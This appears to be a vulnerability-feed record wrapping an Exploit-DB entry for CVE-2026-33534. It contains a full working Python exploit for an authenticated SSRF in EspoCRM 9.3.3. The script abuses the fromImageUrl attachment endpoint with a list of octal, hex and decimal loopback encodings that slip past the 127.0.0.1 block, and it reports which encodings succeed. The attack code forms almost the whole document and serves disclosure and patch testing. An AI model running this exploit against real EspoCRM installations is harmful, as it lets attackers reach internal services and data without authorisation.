{“lastseen”:”2026-05-27T13:27:56″,”description”:”Exploit Title: EspoCRM 9.3.3 – Authenticated SSRF via Alternative IPv4 Notation Google Dork: N\/A Date: 2026-05-08 Exploit Author: Max Gabriel https:\/\/github.com\/EntroVyx Vendor Homepage: https:\/\/www.espocrm.com\/ Software Link:…”,”published”:”2026-05-27T00:00:00″,”modified”:”2026-05-27T00:00:00″,”type”:”exploitdb”,”title”:”EspoCRM 9.3.3 – SSRF”,”source”:””,”references”:””,”id”:”EDB-ID:52583″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-33534″],”sourceData”:”# Exploit Title: EspoCRM 9.3.3 – Authenticated SSRF via Alternative IPv4 Notation\\r\\n# Google Dork: N\/A\\r\\n# Date: 2026-05-08\\r\\n# Exploit Author: Max Gabriel (https:\/\/github.com\/EntroVyx)\\r\\n# Vendor Homepage: https:\/\/www.espocrm.com\/\\r\\n# Software Link: https:\/\/github.com\/espocrm\/espocrm\/releases\/tag\/9.3.3\\r\\n# Version: 9.3.3\\r\\n# Tested on: EspoCRM 9.3.3, Debian\/Kali, Apache\/PHP\\r\\n# CVE : CVE-2026-33534\\r\\n# Advisory: https:\/\/github.com\/espocrm\/espocrm\/security\/advisories\/GHSA-h7gx-8gwv-7g73\\r\\n#\\r\\n# Usage:\\r\\n# python3 CVE-2026-33534.py -u http:\/\/127.0.0.1:8083 -U admin -P ‘Admin12345!’ –internal-port 8083 –cleanup\\r\\n# python3 CVE-2026-33534.py -u https:\/\/target.example -U user -P pass –internal-port 9002 –internal-path \/interno.png\\r\\n# python3 CVE-2026-33534.py -u https:\/\/target.example -U user -P pass –payload 0x7f000001 –payload 2130706433\\r\\n\\r\\nimport argparse\\r\\nimport json\\r\\nimport sys\\r\\nfrom pathlib import Path\\r\\nfrom urllib.parse import urlparse, urlunparse\\r\\n\\r\\nimport requests\\r\\n\\r\\n\\r\\nDEFAULT_LOOPBACK_PAYLOADS = [\\r\\n (\\”octal dotted\\”, \\”0177.0.0.1\\”),\\r\\n (\\”octal dotted padded\\”, \\”0177.0000.0000.0001\\”),\\r\\n (\\”octal compressed\\”, \\”0177.1\\”),\\r\\n (\\”hex dotted\\”, \\”0x7f.0.0.1\\”),\\r\\n (\\”hex dotted full\\”, \\”0x7f.0x0.0x0.0x1\\”),\\r\\n (\\”hex dword\\”, \\”0x7f000001\\”),\\r\\n (\\”decimal dword\\”, \\”2130706433\\”),\\r\\n (\\”octal dword\\”, \\”017700000001\\”),\\r\\n (\\”short IPv4 two-part\\”, \\”127.1\\”),\\r\\n (\\”short IPv4 three-part\\”, \\”127.0.1\\”),\\r\\n (\\”zero-padded dotted\\”, \\”127.000.000.001\\”),\\r\\n (\\”long zero-padded octal\\”, \\”0000000000000000000000000177.0.0.1\\”),\\r\\n]\\r\\n\\r\\n\\r\\ndef normalize_base_url(value):\\r\\n value = value.rstrip(\\”\/\\”)\\r\\n parsed = urlparse(value)\\r\\n\\r\\n if not parsed.scheme or not parsed.netloc:\\r\\n raise argparse.ArgumentTypeError(\\”target URL must include scheme and host\\”)\\r\\n\\r\\n return value\\r\\n\\r\\n\\r\\ndef default_internal_port(base_url):\\r\\n parsed = urlparse(base_url)\\r\\n\\r\\n if parsed.port:\\r\\n return parsed.port\\r\\n\\r\\n return 443 if parsed.scheme == \\”https\\” else 80\\r\\n\\r\\n\\r\\ndef ensure_path(value):\\r\\n if not value:\\r\\n return \\”\/\\”\\r\\n\\r\\n return value if value.startswith(\\”\/\\”) else f\\”\/{value}\\”\\r\\n\\r\\n\\r\\ndef make_url(base_url, host, internal_port, internal_path):\\r\\n parsed = urlparse(base_url)\\r\\n netloc = host\\r\\n\\r\\n default_port = 443 if parsed.scheme == \\”https\\” else 80\\r\\n\\r\\n if internal_port != default_port:\\r\\n netloc = f\\”{host}:{internal_port}\\”\\r\\n\\r\\n return urlunparse((parsed.scheme, netloc, ensure_path(internal_path), \\”\\”, \\”\\”, \\”\\”))\\r\\n\\r\\n\\r\\ndef make_control_url(base_url, internal_port, internal_path):\\r\\n return make_url(base_url, \\”127.0.0.1\\”, internal_port, internal_path)\\r\\n\\r\\n\\r\\ndef load_payloads(args):\\r\\n payloads = list(DEFAULT_LOOPBACK_PAYLOADS)\\r\\n\\r\\n if args.no_default_payloads:\\r\\n payloads = []\\r\\n\\r\\n for item in args.payload or []:\\r\\n payloads.append((\\”custom\\”, item.strip()))\\r\\n\\r\\n if args.payload_file:\\r\\n for line_number, raw_line in enumerate(Path(args.payload_file).read_text().splitlines(), start=1):\\r\\n line = raw_line.strip()\\r\\n\\r\\n if not line or line.startswith(\\”#\\”):\\r\\n continue\\r\\n\\r\\n if \\”=\\” in line:\\r\\n label, host = line.split(\\”=\\”, 1)\\r\\n payloads.append((label.strip() or f\\”file:{line_number}\\”, host.strip()))\\r\\n else:\\r\\n payloads.append((f\\”file:{line_number}\\”, line))\\r\\n\\r\\n seen = set()\\r\\n output = []\\r\\n\\r\\n for label, host in payloads:\\r\\n if not host or host in seen:\\r\\n continue\\r\\n\\r\\n seen.add(host)\\r\\n output.append((label, host))\\r\\n\\r\\n return output\\r\\n\\r\\n\\r\\ndef post_from_image_url(session, base_url, image_url, field, parent_type, parent_id, timeout):\\r\\n endpoint = f\\”{base_url}\/api\/v1\/Attachment\/fromImageUrl\\”\\r\\n payload = {\\r\\n \\”url\\”: image_url,\\r\\n \\”field\\”: field,\\r\\n \\”parentType\\”: parent_type,\\r\\n }\\r\\n\\r\\n if parent_id:\\r\\n payload[\\”parentId\\”] = parent_id\\r\\n\\r\\n return session.post(endpoint, json=payload, timeout=timeout)\\r\\n\\r\\n\\r\\ndef parse_json(response):\\r\\n try:\\r\\n return response.json()\\r\\n except json.JSONDecodeError:\\r\\n return None\\r\\n\\r\\n\\r\\ndef short_body(response):\\r\\n body = response.text.replace(\\”\\\\r\\”, \\”\\\\\\\\r\\”).replace(\\”\\\\n\\”, \\”\\\\\\\\n\\”)\\r\\n\\r\\n if len(body) \\u003e 420:\\r\\n return body[:420] + \\”…\\”\\r\\n\\r\\n return body\\r\\n\\r\\n\\r\\ndef delete_attachment(session, base_url, attachment_id, timeout):\\r\\n response = session.delete(f\\”{base_url}\/api\/v1\/Attachment\/{attachment_id}\\”, timeout=timeout)\\r\\n\\r\\n return response.status_code in {200, 204}\\r\\n\\r\\n\\r\\ndef is_successful_bypass(response):\\r\\n data = parse_json(response)\\r\\n\\r\\n return (\\r\\n response.status_code == 200 and\\r\\n isinstance(data, dict) and\\r\\n bool(data.get(\\”id\\”))\\r\\n ), data\\r\\n\\r\\n\\r\\ndef print_result(label, host, response, data):\\r\\n if isinstance(data, dict) and data.get(\\”id\\”):\\r\\n print(\\r\\n f\\”[+] {label:24} {host:38} HTTP {response.status_code} \\”\\r\\n f\\”id={data.get(‘id’)} type={data.get(‘type’)} size={data.get(‘size’)}\\”\\r\\n )\\r\\n\\r\\n return\\r\\n\\r\\n reason = response.headers.get(\\”X-Status-Reason\\”) or short_body(response) or \\”-\\”\\r\\n print(f\\”[-] {label:24} {host:38} HTTP {response.status_code} {reason}\\”)\\r\\n\\r\\n\\r\\ndef main():\\r\\n parser = argparse.ArgumentParser(\\r\\n description=\\”Authenticated EspoCRM CVE-2026-33534 SSRF verification exploit with multiple encoded loopback payloads.\\”\\r\\n )\\r\\n parser.add_argument(\\”-u\\”, \\”–url\\”, required=True, type=normalize_base_url, help=\\”Base URL, e.g. http:\/\/host:8083\\”)\\r\\n parser.add_argument(\\”-U\\”, \\”–username\\”, required=True, help=\\”EspoCRM username\\”)\\r\\n parser.add_argument(\\”-P\\”, \\”–password\\”, required=True, help=\\”EspoCRM password\\”)\\r\\n parser.add_argument(\\”–internal-port\\”, type=int, help=\\”Internal loopback port for the self-fetch PoC\\”)\\r\\n parser.add_argument(\\”–internal-path\\”, default=\\”\/client\/img\/logo-light.svg\\”, help=\\”Internal path for the self-fetch PoC\\”)\\r\\n parser.add_argument(\\”–payload\\”, action=\\”append\\”, help=\\”Additional loopback host notation to test, e.g. 0x7f000001\\”)\\r\\n parser.add_argument(\\”–payload-file\\”, help=\\”File with one host payload per line, or label=host\\”)\\r\\n parser.add_argument(\\”–no-default-payloads\\”, action=\\”store_true\\”, help=\\”Use only –payload\/–payload-file entries\\”)\\r\\n parser.add_argument(\\”–field\\”, default=\\”avatar\\”, help=\\”Attachment field used by fromImageUrl\\”)\\r\\n parser.add_argument(\\”–parent-type\\”, default=\\”User\\”, help=\\”Parent entity type used by fromImageUrl\\”)\\r\\n parser.add_argument(\\”–parent-id\\”, help=\\”Optional parent entity id\\”)\\r\\n parser.add_argument(\\”–timeout\\”, type=float, default=15.0, help=\\”HTTP timeout\\”)\\r\\n parser.add_argument(\\”–cleanup\\”, action=\\”store_true\\”, help=\\”Attempt to delete attachments created by successful payloads\\”)\\r\\n parser.add_argument(\\”–stop-on-first\\”, action=\\”store_true\\”, help=\\”Stop after the first successful payload\\”)\\r\\n parser.add_argument(\\”–insecure\\”, action=\\”store_true\\”, help=\\”Disable TLS certificate verification\\”)\\r\\n args = parser.parse_args()\\r\\n\\r\\n payloads = load_payloads(args)\\r\\n\\r\\n if not payloads:\\r\\n print(\\”[-] No payloads to test.\\”)\\r\\n return 2\\r\\n\\r\\n internal_port = args.internal_port or default_internal_port(args.url)\\r\\n control_url = make_control_url(args.url, internal_port, args.internal_path)\\r\\n\\r\\n session = requests.Session()\\r\\n session.auth = (args.username, args.password)\\r\\n session.headers.update({\\”Accept\\”: \\”application\/json\\”})\\r\\n session.verify = not args.insecure\\r\\n\\r\\n print(f\\”[*] Target: {args.url}\\”)\\r\\n print(f\\”[*] Control URL: {control_url}\\”)\\r\\n print(f\\”[*] Payload count: {len(payloads)}\\”)\\r\\n\\r\\n control = post_from_image_url(\\r\\n session,\\r\\n args.url,\\r\\n control_url,\\r\\n args.field,\\r\\n args.parent_type,\\r\\n args.parent_id,\\r\\n args.timeout,\\r\\n )\\r\\n\\r\\n print(f\\”[*] Control response: HTTP {control.status_code} {control.headers.get(‘X-Status-Reason’) or short_body(control) or ‘-‘}\\”)\\r\\n\\r\\n if control.status_code != 403:\\r\\n print(\\”[!] The direct 127.0.0.1 control was not blocked with HTTP 403. Results may not prove CVE-2026-33534.\\”)\\r\\n\\r\\n successes = []\\r\\n\\r\\n for label, host in payloads:\\r\\n ssrf_url = make_url(args.url, host, internal_port, args.internal_path)\\r\\n response = post_from_image_url(\\r\\n session,\\r\\n args.url,\\r\\n ssrf_url,\\r\\n args.field,\\r\\n args.parent_type,\\r\\n args.parent_id,\\r\\n args.timeout,\\r\\n )\\r\\n successful, data = is_successful_bypass(response)\\r\\n print_result(label, host, response, data)\\r\\n\\r\\n if successful:\\r\\n successes.append((label, host, ssrf_url, data))\\r\\n\\r\\n if args.cleanup and data.get(\\”id\\”):\\r\\n if delete_attachment(session, args.url, data[\\”id\\”], args.timeout):\\r\\n print(f\\” cleanup: deleted attachment {data[‘id’]}\\”)\\r\\n else:\\r\\n print(f\\” cleanup: failed to delete attachment {data[‘id’]}\\”)\\r\\n\\r\\n if args.stop_on_first:\\r\\n break\\r\\n\\r\\n if not successes:\\r\\n print(\\”[-] No encoded loopback payload produced an attachment.\\”)\\r\\n return 2\\r\\n\\r\\n print(\\”\\”)\\r\\n print(\\”[+] Vulnerable behavior confirmed.\\”)\\r\\n print(f\\”[+] Direct loopback control: HTTP {control.status_code}\\”)\\r\\n print(f\\”[+] Successful payloads: {len(successes)}\\”)\\r\\n\\r\\n for label, host, ssrf_url, data in successes:\\r\\n print(f\\” – {label}: {host} -\\u003e {data.get(‘type’)} ({ssrf_url})\\”)\\r\\n\\r\\n return 0 if control.status_code == 403 else 1\\r\\n\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n try:\\r\\n sys.exit(main())\\r\\n except requests.RequestException as exc:\\r\\n print(f\\”[-] HTTP error: {exc}\\”)\\r\\n sys.exit(1)”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52583″,”cvss”:{“score”:4.3,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:L\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52583″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-27T13:27:56″,”description”:”Exploit Title: EspoCRM 9.3.3 – Authenticated SSRF via Alternative IPv4 Notation Google Dork: N\/A Date: 2026-05-08 Exploit Author: Max Gabriel https:\/\/github.com\/EntroVyx Vendor Homepage: https:\/\/www.espocrm.com\/ Software…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,123,12,40,21,13,7,11,5],"class_list":["post-57395","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-43","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n